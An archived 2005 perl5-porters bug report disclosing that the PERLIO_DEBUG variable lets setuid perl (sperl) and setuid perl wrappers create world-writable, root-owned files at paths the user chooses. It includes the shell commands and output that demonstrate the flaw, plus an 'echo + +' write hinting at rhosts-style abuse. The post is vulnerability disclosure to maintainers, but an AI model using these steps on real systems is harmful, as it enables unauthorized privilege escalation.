develooper Front page | perl.perl5.porters | Postings from January 2005

[perl #33990] setuid perl security issues

Thread Next
January 30, 2005 12:50
[perl #33990] setuid perl security issues
Message ID:
# New Ticket Created by  "KF (Lists)" 
# Please include the string:  [perl #33990]
# in the subject line of all future correspondence about this issue. 
# <URL: >

If set to the name of a file or device then certain operations of PerlIO
sub-system will be logged to that file (opened as append). Typical uses
are UNIX:

PerlIO_debug(const char *fmt, ...)
    if (!dbg) {
        char *s = PerlEnv_getenv("PERLIO_DEBUG");
        if (s && *s)
            dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666);
            dbg = -1;

If $ENV{'PERLIO_DEBUG'} is not set PerlIO_debug() is a no-op.

else you can do the following either via sperl or vial sperl: 

kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4
-rwsr-xr-x  1 root root 63808 2004-12-11 18:32 /usr/bin/sperl5.8.4
kfinisterre@jdam:~$ export PERLIO_DEBUG=/tmp/aaa
kfinisterre@jdam:~$ umask 001
kfinisterre@jdam:~$ /usr/bin/sperl5.8.4
sperl needs fd script
You should not call sperl directly; do you need to change a #! line
from sperl to perl?
kfinisterre@jdam:~$ ls -al /tmp/aaa
-rw-rw-rw-  1 root kfinisterre 1403 2005-01-30 02:34 /tmp/aaa

setuid wrapper:
kfinisterre@jdam:/tmp$ ls -al /usr/sbin/mooix-pty-helper
/usr/sbin/mooregister /usr/sbin/moopasswd
-rwsr-xr-x  1 root root 2872 2003-11-20 15:28/usr/sbin/mooix-pty-helperc
-rwsr-xr-x  1 root root 2832 2003-11-20 15:28 /usr/sbin/moopasswd
-rwsr-xr-x  1 root root 2836 2003-11-20 15:28 /usr/sbin/mooregister

These are all setuid programs that invoke perl scripts.


kfinisterre@jdam:/tmp$ umask 001
kfinisterre@jdam:/tmp$ export PERLIO_DEBUG=/tmp/oops2
kfinisterre@jdam:/tmp$ /usr/sbin/mooix-pty-helper
need a session dir at /usr/share/mooix/ line 22,
<CONFIG> line 98.
kfinisterre@jdam:/tmp$ ls -al /tmp/oops2
-rw-rw-rw-  1 root kfinisterre 30285 2005-01-30 02:23 /tmp/oops2

kfinisterre@jdam:/tmp$ tail /tmp/oops2 -n 3
/usr/share/mooix/ fd 0 refcnt=0
/usr/share/mooix/ fd 1 refcnt=0
/usr/share/mooix/ fd 2 refcnt=0

kfinisterre@jdam:/tmp$ echo + + > /tmp/oops2

kfinisterre@jdam:~$ ls -al /etc/
ls: /etc/ No such file or directory

gonna try to write an exploit without trashing my box. hehe. fun time.

Thread Next Perl Programming lists via nntp and http.
Comments to Ask Bjørn Hansen at | Group listing | About